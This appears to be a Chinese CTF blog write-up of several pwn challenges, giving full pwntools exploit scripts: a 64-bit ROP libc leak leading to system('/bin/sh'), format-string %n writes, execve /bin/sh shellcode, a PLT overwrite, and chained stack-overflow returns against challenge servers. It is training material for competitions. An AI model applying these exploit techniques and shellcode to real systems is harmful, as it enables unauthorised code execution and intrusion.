最近刷了一些pwn题,攻防世界 、蓝帽杯等等,发现提升CTF的最快方法还是刷题,刷题,刷题。此篇文章涉
及到的知识点:64位rop解体流程、格式化字符串的基本原理和一些利用方式以及如何改写plt。
0x0:pwn-100
64位程序
发现前两个函数标准输入输出,然后我们来看一下第三个函数 发现里面又套了一层函数
栈空间大小为40 我们可以把这个sub_40063D函数当成read函数
这个的意思就是
修改edi的目的达成 直接call put的指令的意思就是打印
put的plt地址意味着调用put函put函数的参数存放再rdi中 rdi此时是got[put]
打印got表put函数的地址
from pwn import *
from LibcSearcher import LibcSearcher
#导入libcsearcher来搜索此执行程序使用的哪个got表
#一种got表对应一种libsearcher
context.log_level = 'debug'
io = process('./6')
io = remote('111.200.241.244',57644)
elf = ELF('./6')
payload = b'b'*0x48+p64(0x0000000000400763)+p64(elf.got['puts'])+p64(elf.p
lt['puts'])+p64(0x00000000004006B8)
#分析一下这个payload,首先栈溢出,然后加上pop rdi 的地址,在接上got表中的puts
plt是运行puts函数,最后再接上main函数地址
#got表中的puts是一串地址
io.sendline(payload.ljust(200,b'b'))
#题目中写明了for循环必须要200字符串
#print(io.recv())
io.recvuntil('\n')
got_put_addr = u64(io.recv().split(b'\n')[0].ljust(8,b'\x00'))
print(got_put_addr)
#利用got表中的puts函数算出got表中其他函数的相对偏移
libc_obj = LibcSearcher('puts', got_put_addr)
libc_base_addr = got_put_addr - libc_obj.dump('puts')
system_addr = libc_base_addr + libc_obj.dump("system")
str_bin_sh = libc_base_addr + libc_obj.dump('str_bin_sh')
payloads = b'b'*0x48+p64(0x0000000000400763)+p64(str_bin_sh)+p64(system_addr)
io.sendline(payloads)
io.interactive()
#p64(0x0000000000400763) =rdi
p64(0x0000000000400763)+p64(elf.got['puts']) 把got表中的puts传送给rdi
0x1:lanmao分区pwn
首先checksec一下,发现保护全开
然后我们用ida打开
我们在这里发现了一个格式化字符串漏洞
用one_gadget查看glibc自带的后门函数地址
这道题的思路:
首先我们利用print函数来算出野指针到s的地址然后算出s到ret的地址,加和算出一共的%p
我们把ret函数返回到one_gadget泄露got表的后门地址
0x2:格式化字符串进阶
第一个函数
第二个函数
print(format)的作用就是格式化字符串,使得v4 = v3
第三个函数
流程:
%85c%7p$n
这里算出来是8,指的是v3的地址 但是我们要在v2中写入东西 所以要减去偏移
输入up,east,1跳过第一个函数 进入第二个函数
下面我们进行exp的编写:
shellcode写在这里
64位的shellcode:
"\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53
\x54\x5f\x52\x57\x54\x5e\x0f\x05"
from pwn import *
context.log_level = 'debug'
io = remote('111.200.241.244',53443)
io.recvuntil('is')
a=io.recvuntil('\n')[:-1]
b=int(a,16)
print(a)
print(b)
io.sendlineafter('What should your character\'s name be:','1')
io.sendlineafter('So, where you will go?east or up?:','east')
io.sendlineafter('go into there(1), or leave(0)?:','1')
io.sendlineafter('Give me an address',str(b))
#p64()格式是写入内存,机器码识别,但是此题是写入栈中的变量中,直接字符串格式就行(也就是v2)
#我是猪!,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p
io.sendline('%85c%7$n')
io.sendline("\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\
x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05")
io.interactive()
0x3:格式化字符串入门 CGfsb %n
格式化字符串漏洞入门利用%n
算出第10个偏移是野指针的地址
这里进行验证,确实是第十个,
接下来写exp
from pwn import *
context.log_level = 'debug'
io = remote('111.200.241.244',55751)
io.sendline('de')
payload = p32(0x0804A068)+b'我是猪!'+b'%10$n'
io.sendline(payload)
io.interactive()
#我是猪!.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
payload = p32(0x0804A068)+b'我是猪!'+b'%10$n'
payload格式是这个,前面是要修改的地址,用字符补全 再用%10$n打进去
0x4:cover蓝帽杯半决赛1 改写plt
首先checksec一下 发现是32位程序 No PIE
from pwn import *
sh=process('cover')
sh.recvuntil('\n')
sh.send(p32(0x80484d0+2)+b'\x24')
#此题的关键就是在这里,0x80484d0是plt中puts函数的地址+2就是关键所在
#然后直接改成x24就是改成了system,然后在接上一个/bin/sh
sh.sendline('/bin/sh')
sh.interactive()
0x5:栈溢出反应釜开关控制
首先checksec 一下
解题思路:
套了三层循环 每进入一层循环需要输入地址 我们只能一边调一边进入
进入第一个函数的地址
from pwn import *
context.log_level = 'debug'
#io = process('10')
io = remote('111.200.241.244',56649)
payload1= b'a'*(0x100+0x8)+p64(0x4005f6)
payload2= b'a'*(0x180+0x8)+p64(0x400607)
payload3= b'a'*(0x200+0x8)+p64(0x00000000004006B0)
io.sendlineafter('>',payload3)
io.recv()
进入第二个函数的地址
第三次的地址
最终exp:
from pwn import *
context.log_level = 'debug'
#io = process('10')
io = remote('111.200.241.244',56649)
payload1= b'a'*(0x100+0x8)+p64(0x4005f6)
payload2= b'a'*(0x180+0x8)+p64(0x400607)
payload3= b'a'*(0x200+0x8)+p64(0x00000000004006B0)
io.sendlineafter('>',payload3)
io.recv()
#io.sendline('a')
io.sendline(payload2)
#io.recv()
io.sendline(payload1)
#io.recv()
io.interactive()
0x6:小结
pwn的解题对选手的内存 C语言 汇编语言底层功底要求很高 在学习过程中一定不用求快
需要扎实的学习。这样才能更快的解题。 |
